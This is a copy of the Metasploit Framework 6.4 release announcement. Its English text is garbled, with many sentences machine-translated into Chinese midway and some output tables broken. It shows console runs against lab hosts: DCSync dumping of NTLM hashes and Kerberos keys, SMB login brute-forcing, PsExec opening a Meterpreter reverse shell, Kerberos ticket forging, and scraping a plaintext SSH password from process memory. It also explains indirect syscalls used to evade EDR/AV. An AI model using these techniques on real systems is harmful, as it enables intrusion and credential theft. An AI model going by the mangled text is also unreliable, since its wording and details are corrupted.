Last updated at Mon, 25 Mar 2024 13:45:59 GMT
今天,Metasploit很高兴地宣布发布Metasploit框架6.4. It has been just over a year since the release of version 6.3 从那时起,该团队增加了许多新功能和改进.
For news reporters, please reach out to press@vitrincep.com.
Kerberos Improvements
Metasploit 6.3 included initial support for Kerberos authentication within Metasploit and was one of the larger features in the release. Since then, Metasploit has continued to make Kerberos-related improvements, adding capabilities that didn’t make it into the 6.3 cut.
- The
auxiliary/admin/kerberos/forge_ticketmodule was updated with:- Support for the diamond and sapphire techniques in addition to the original golden and silver techniques.
- The additional fields used by Windows Server 2022, enabling its compatibility with the latest Windows targets.
- We added the
post/windows/manage/kerberos_ticketspost模块,该模块允许用户从受损主机转储Kerberos票据. This is similar functionality to what the popular Rubeus tool’sklist/dumpcommands do and operates entirely in memory. 有了这一点,用户现在可以利用无约束委托的实例. - The
auxiliary/gather/windows_secrets_dumpmodule was updated to support pass-the-ticket authentication when using the DCSync technique (theDOMAINaction). This enables users to dump all of the secrets from the target given only a valid Kerberos ticket with the required permissions instead of requiring authentication by username and password.
Example of running the gather/windows_secrets_dump module with Kerberos authentication and the DOMAIN action:
msf6 auxiliary(gather/windows_secrets_dump) > run rhost=192.168.123.133 username=vagrant password=vagrant smb::auth=kerberos domaincontrollerrhost=192.168.123.133 smb::rhostname=dc01.demo.local domain=demo.local action=DOMAIN
[*] Running module against 192.168.123.133
[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid TGT-Response
[*] 192.168.123.133:445 - 192.168.123.133:445 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20240319130521_default_192.168.123.133_mit.kerberos.cca_724176.bin
[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid TGS-Response
[*] 192.168.123.133:445 - 192.168.123.133:445 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20240319130521_default_192.168.123.133_mit.kerberos.cca_878194.bin
[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid delegation TGS-Response
[*] 192.168.123.133:445 - Opening Service Control Manager
…
[*] 192.168.123.133:445 - Using cached credential for krbtgt/DEMO.LOCAL@DEMO.LOCAL vagrant@DEMO.LOCAL
[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid TGS-Response
[*] 192.168.123.133:445 - 192.168.123.133:445 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20240319130522_default_192.168.123.133_mit.kerberos.cca_113846.bin
[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid delegation TGS-Response
[*] 192.168.123.133:445 - Bound to DRSR
[*] 192.168.123.133:445 -为用户解密哈希:CN=Administrator,CN=Users,DC=demo,DC=local
[*] 192.168.123.133:445 -解密用户的哈希:CN=Guest,CN=Users,DC=demo,DC=local
[*] 192.168.123.133:445 -解密用户哈希:CN=krbtgt,CN=Users,DC=demo,DC=local
[*] 192.168.123.133:445 -解密用户哈希值:CN=vagrant,CN=Users,DC=demo,DC=local
[*] 192.168.123.133:445 -为用户解密哈希:CN=DC01,OU=Domain Controllers,DC=demo,DC=local
[*] 192.168.123.133:445 -为用户解密哈希:CN=DESKTOP-QUUL3FQV,CN=Computers,DC=demo,DC=local
# SID's:
Administrator: S-1-5-21-1242350107-3695253863-3717863007-500
…
# NTLM hashes:
管理员:500:aad3b435b51404eeaad3b435b51404ee: c3adff536329bc46a8db473dc318d54a:::
…
# Full pwdump format:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c3adff536329bc46a8db473dc318d54a:Disabled=false,Expired=false,PasswordNeverExpires=true,PasswordNotRequired=false,PasswordLastChanged=202309151519,LastLogonTimestamp=never,IsAdministrator=true,IsDomainAdmin=true,IsEnterpriseAdmin=true::
…
# Kerberos keys:
Administrator:aes256-cts-hmac-sha1-96:f68d8df38809b402cf49799faf991e77d3d931235d1cfa20fab35d348c0fa6a6
…
[*] 192.168.123.133:445 - Cleaning up...
[*] Auxiliary module execution completed
DNS Configuration
使用Metasploit框架的主要好处之一是集成的方式来 pivot connections over established sessions without needing to set up proxies. 这意味着Metasploit经常在模块运行时处理各种服务的DNS查询. Over the past year, Metasploit has made improvements to how it handles its own DNS queries to ensure they are not leaked unintentionally.
Users can configure how hostnames should be resolved. This is particularly useful in pivoting scenarios to ensure that the requests for a specific domain (or all domains) are resolved using a configured nameserver optionally contacted via an established session. As an example, users can configure Metasploit to ensure that their DNS queries for internal resources are originating from a compromised host and not themselves.
Examples of manipulating the DNS configuration:
dns add --rule *.lab.lan --session 1 --index 1 192.0.2.1
dns add --rule honeypot.lab.lan --index 2 black-hole
dns add-static example2.lab.lan 192.0.2.201
dns add --index 1 --rule * static system 192.0.2.1
Viewing the current configuration:
msf6 > dns print
Default search domain: N/A
Default search list:
* tor.example.com
* localdomain
Current cache size: 0
Resolver rule entries
=====================
# Rule Resolver Comm channel
- ---- -------- ------------
1 *.lab.lan 192.0.2.1 Session 1
2 honeypot.lab.lan black-hole N/A
3 *
. \_ static N/A
. \_ 10.4.5.45
. \_ 10.3.20.98
Static hostnames
================
Hostname IPv4 Address IPv6 Address
-------- ------------ ------------
example.lab.lan 192.0.2.200
example2.lab.lan 192.0.2.201
New session types
Metasploit 6.4 adds support for new PostgreSQL, MSSQL, MySQL and SMB session types. The SQL session types allow interactive queries with a remote database instance while the new SMB session will let you interact with a share, navigate directories, upload, and download files. 所有这些新的会话类型也可以与相关的辅助模块一起使用, meaning you can get a single SMB or SQL session and run multiple modules against the session without needing to reconnect each time.
New SMB Session Type Examples
You can open a new SMB session by setting the CreateSession option:
msf6 > use scanner/smb/smb_login
msf6 auxiliary(scanner/smb/smb_login) > run rhost=192.168.123.133 username=vagrant password=vagrant CreateSession=true
[*] 192.168.123.133:445 - 192.168.123.133:445 - Starting SMB login bruteforce
[+] 192.168.123.133:445 - 192.168.123.133:445 - Success: '.\vagrant:vagrant' Administrator
[!] 192.168.123.133:445 - No active DB -- Credential data will not be saved!
[*] SMB session 2 opened (192.168.123.1:52253 -> 192.168.123.133:445) at 2024-03-19 12:07:15 +0000
[*] 192.168.123.133:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_login) >
The session will open as a new SMB session type:
msf6 auxiliary(scanner/smb/smb_login) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 smb SMB vagrant @ 192.168.123.133:445 192.168.123.1:53541 -> 192.168.123.133:445 (192.168.123.133)
msf6 auxiliary(scanner/smb/smb_login) >
Interacting with the session allows for direct file manipulation of the remote host including upload and download support:
msf6 auxiliary(scanner/smb/smb_login) > sessions -i -1
[*] Starting interaction with 1…
SMB (192.168.123.133) > ls
[-] No active share selected. Use the shares command to view available shares, and shares -i to interact with one
SMB (192.168.123.133) > shares
Shares
======
# Name Type comment
- ---- ---- -------
0 ADMIN$ DISK|SPECIAL Remote Admin
1 C$ DISK|SPECIAL Default share
2 foo DISK
3 IPC$ IPC|SPECIAL Remote IPC
4 NETLOGON DISK Logon server share
5 SYSVOL DISK Logon server share
SMB (192.168.123.133) > shares -i foo
[+] Successfully connected to foo
SMB (192.168.123.136\foo) > ls
Shares
======
# Type Name Created Accessed Written Changed Size
- ---- ---- ------- -------- ------- ------- ----
0 DIR . 2023-09-15T18:56:07+01:00 2023-10-10T12:39:26+01:00 2023-10-10T12:39:26+01:00 2023-10-10T12:39:26+01:00
1 DIR .. 2021-05-08T09:06:51+01:00 2024-02-01T13:11:41+00:00 2024-02-01T13:11:41+00:00 2024-02-01T13:11:41+00:00
2 FILE passwords.docx 2023-10-10T12:34:57+01:00 2023-10-10T12:38:53+01:00 2023-10-10T12:38:53+01:00 2023-10-10T12:38:53+01:00 1403
The new session type supports using existing modules through the session types such as Metasploit’s secret’s dump module which will still keep the session alive afterwards:
msf6 auxiliary(scanner/mysql/mysql_hashdump) > use auxiliary/gather/windows_secrets_dump
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf6 auxiliary(gather/windows_secrets_dump) > run session=-1
或者你可以运行Metasploit的PsExec支持SMB会话来打开Meterpreter会话:
msf6 > use windows/smb/psexec
[*] Using configured payload windows/meterpreter/reverse_tcp
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf6 exploit(windows/smb/psexec) > run session=-1
…
[*] Sending stage (176198 bytes) to 10.4.227.91
[*] Meterpreter session 2 opened (10.4.227.91:4444 -> 10.4.227.91:50319) at 2024-03-19 16:41:45 +0000
meterpreter >
Kerberos authentication is also supported:
msf6 auxiliary(scanner/smb/smb_login) > run rhost=192.168.123.133 username=vagrant password=vagrant smb::auth=kerberos domaincontrollerrhost=192.168.123.133 smb::rhostname=dc01.demo.local domain=demo.local createsession=true
[*] 192.168.123.133:445 - 192.168.123.133:445 - Starting SMB login bruteforce
[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid TGT-Response
[*] 192.168.123.133:445 - 192.168.123.133:445 - TGT MIT凭据缓存票据保存到/Users/adfoster/.msf4/loot/20240319164301_default_192.168.123.133_mit.kerberos.cca_903639.bin
[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid TGS-Response
[*] 192.168.123.133:445 - 192.168.123.133:445 - TGS MIT凭据缓存票据保存到/Users/adfoster/.msf4/loot/20240319164301_default_192.168.123.133_mit.kerberos.cca_231110.bin
[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid delegation TGS-Response
[+] 192.168.123.133:445 - 192.168.123.133:445 - Success: 'demo.local\vagrant:vagrant' Administrator
[*] SMB session 3 opened (192.168.123.1:50336 -> 192.168.123.133:445) at 2024-03-19 16:43:01 +0000
[*] 192.168.123.133:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_login) >
New SQL Session Types Examples
Metasploit 6.4 has added support for PostgreSQL, MSSQL, MySQL session types. You can open a new SMB session by setting the CreateSession option:
msf6 > use auxiliary/scanner/mssql_login
msf6 auxiliary(scanner/smb/smb_login) > run CreateSession=true RPORT=1433 RHOSTS=192.168.2.242 USERNAME=user PASSWORD=password
Which will create a new SQL session:
[*] 192.168.2.242:1433 - 192.168.2.242:1433 - MSSQL - Starting authentication scanner.
[!] 192.168.2.242:1433 - No active DB -- Credential data will not be saved!
[+] 192.168.2.242:1433 - 192.168.2.242:1433 - Login Successful: WORKSTATION\user:password
[*] MSSQL session 1 opened (192.168.2.1:60963 -> 192.168.2.242:1433) at 2024-03-15 13:41:31 -0500
[*] 192.168.2.242:1433 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Which you can interact with using sessions -i or sessions -i -1 to interact with the most recently opened session:
msf6 auxiliary(scanner/mssql/mssql_login) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 mssql MSSQL test @ 192.168.2.242:143 192.168.2.1:60963 -> 192.168.23 .242:1433 (192.168.2.242)
msf6 auxiliary(scanner/mssql/mssql_login) > sessions -i 1
[*] Starting interaction with 1…
mssql @ 192.168.2.242:1433 (master) > query 'select @@version;'
Response
========
# NULL
- ----
0 Microsoft SQL Server 2022 (RTM) - 16.0.1000.6 (X64)
Oct 8 2022 05:58:25
Copyright (C) 2022 Microsoft Corporation
Developer Edition (64-bit) on Windows Server 2022 Stand
ard 10.0 (Build 20348: ) (Hypervisor)
The query_interactive 命令将启动一个交互式提示符,用于运行多个多行查询:
mssql @ 192.168.2.242:1433 (master) > query_interactive
[*] Starting interactive SQL shell for mssql @ 192.168.2.242:1433 (master)
[*] SQL commands ending with ; will be executed on the remote server. Use the exit command to exit.
SQL >> select *
SQL *> from information_schema.tables
SQL *> where table_type = 'BASE TABLE';
[*] Executing query: select * from information_schema.tables where table_type = 'BASE TABLE';
Response
========
# table_catalog table_schema table_name
- ------------- ------------ ---------- ----------
0 master dbo spt_fallback_db BASE表
1 master dbo spt_fallback_dev BASE表
2 . master dbo spt_fallback_usg BASE表
master dbo Users BASE TABLE
5 master dbo spt_monitor BASE表
6 master dbo MSreplication_options BASE表
SQL >>
Similar to SMB sessions, the new SQL modules can run with multiple auxiliary modules, available modules can be searched for:
msf6 > search session_type:smb session_type:postgres session_type:mssql session_type:mysql
Indirect Syscalls Support for Windows Meterpreter
间接系统调用是一种众所周知的技术,通常用于绕过EDR/AV检测. 这种技术在执行动态分析时特别有用, where the security software monitors every process on the system to detect any suspicious activity. 一种常见的方法是在Win32 API调用上添加用户域钩子, especially those commonly used by malware. Syscalls are a way to run system routines directly and enter kernel mode without passing through the Win32 API.
This first implementation focuses on substituting the Win32 API calls used by the Reflective DLL Injection (RDI) library with indirect syscalls to the corresponding native APIs. For example, VirtualAlloc has been substituted by a system call to ZwAllocateVirtualMemory. Since RDI is used everywhere by Meterpreter and its extensions, it was a very good candidate for this initial work.
The main difficulty is finding the correct syscall number since it is not the same across Windows versions. Also, EDRs usually hook the NTDLL native API, making the discovery of syscall numbers more challenging. The technique used for this is based on the assumption that the syscall numbers are assigned in a sequential order, starting from the number 0. If we look at how native API functions are stored in memory, 系统调用号可以从相关的本机API函数在内存中的位置推断出来. The technique consists in selecting the system call functions (Zw…) from ntdll.dll 导出它们并按它们的内存地址升序排序. 一个给定的本机API函数的系统调用号就是它在这个排序列表中的索引. This is very similar to the technique used by Halo's Gate.
Another technique we incorporated is to ensure the call to the syscall instruction is made through ntdll.dll. 这种行为有时被称为“间接系统调用”。. EDR/AV可以监视这一点,并标记任何不来自的系统调用 ntdll.dll as suspicious. This technique is directly taken from RecycledGate. Here, the complexity is that Meterpreter must be compatible with all Windows versions from WinXP to the most recent flavors. This implementation will take care of parsing ntdll.dll and get the correct trampoline address that will be used when the system call is executed.
这项工作是第一步,我们预计今年会有更多的增加. The next step is to switch additional Win32 API requests that Meterpreter and its extensions make to their corresponding native API using indirect syscalls. The long-term goal is to make indirect syscalls a standard for any future Windows-based development (payload, exploit, etc.). 用户不需要进行任何更改,就可以使用这些新更改运行Meterpreter.
Discoverability Improvements
The definition of “a module” can be a nebulous thing. In recent years, 一些模块已经开始在单个漏洞中包含多个cve,作为链的一部分.g., Proxy(Not)Shell),而其他cve则影响多个产品并保证多个模块(例如.g., Log4Shell). Furthermore, modules that aren’t exploiting a particular vulnerability often have different actions they can take, like forging different types of Kerberos tickets or running different LDAP queries for enumeration. As Metasploit development moves quickly, with new content being released each week, it can be difficult for users to find what they’re looking for.
Metasploit 6.4做了一些改进,使用户更容易发现. One of the largest changes is the new Hierarchical Search feature. This will cause Metasploit’s internal search capabilities to match additional fields within modules, including the actions, targets and AKA aliases. As an example, this will cause the auxiliary/admin/kerberos/forge_ticket module to show up when the user searches for forge_golden because it is an action of the module:
msf6 auxiliary(scanner/mysql/mysql_hashdump) > search kerberos forge
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/kerberos/forge_ticket . 正常无Kerberos银/金/钻石/蓝宝石票锻造
1 \_ action: FORGE_DIAMOND . . . Forge a Diamond Ticket
2 \_ action: FORGE_GOLDEN . . . Forge a Golden Ticket
3 \_ action: FORGE_SAPPHIRE . . . Forge a Sapphire Ticket
4 \_ action: FORGE_SILVER . . . Forge a Silver Ticket
5 \_ AKA: Ticketer . . . .
6 \_ AKA: Klist . . . .
7 auxiliary/admin/kerberos/ms14_068_kerberos_checksum 2014-11-18 normal No MS14-068 Microsoft Kerberos Checksum Validation Vulnerability
Interact with a module by name or index. 例如info 7,使用7或使用auxiliary/admin/kerberos/ms14_068_kerberos_checksum
msf6 auxiliary(scanner/mysql/mysql_hashdump) >
Windows Meterpreter Memory Searching
Metasploit 6.4 incorporates a new feature for Windows Meterpreter that allows for searching a process's memory for user-specified needles with support for regular expressions. 这可以用来搜索和发现针附近的内存中潜在的敏感数据, similar to Linux's MimiPenguin tool. This can be executed against any process with the same or lower privilege level as the Meterpreter session.
This new API is currently in use by the post/multi/gather/memory_search module, where it can be used to search for plaintext credentials - for instance in some configurations of OpenSSH:
msf6 post(multi/gather/memory_search) > run session=1 regex="publickey,password.*" process_names_glob="ssh*"
[*]运行模块对- DESKTOP-NO8VQQB\win10 @ DESKTOP-NO8VQQB (192.168.112.129). This might take a few seconds...
[*] Getting target processes...
[*] Running against the following processes:
ssh.exe (pid: 2972)
[*] Memory Matches for ssh.exe (pid: 2972)
======================================
Match Address Match Length Match Buffer Memory Region Start Memory Region Size
------------- ------------ ------------ ------------------- ------------------
0x0000000A00060DF0 127 "publickey,password......3.......myverysecretpassword....................#.........#.......... 0x0000000A00000000 0x0000000000090000
...........S......................"
[*] Post module execution completed
Get it
与往常一样,您可以使用 msfupdate 你可以在GitHub上获得自上一篇博客文章以来的更多变化细节:
If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. 要安装fresh而不使用git,您可以使用open-source-only Nightly Installers or the commercial edition Metasploit Pro
Thanks to both Rapid7 developers and Metasploit community members for all their hard work on delivering this latest set of Metasploit features, in particular: Alan Foster, Ashley Donaldson, Brendan Watters, Chris Granleese, Christophe de la Fuente, Dean Welch, Jack Heysel, Jacquie Harris, Jeffrey Martin, Navya Harika Karaka, Simon Janusz, Zach Goldman, Egor Kalinichev, and Spencer McIntyre.
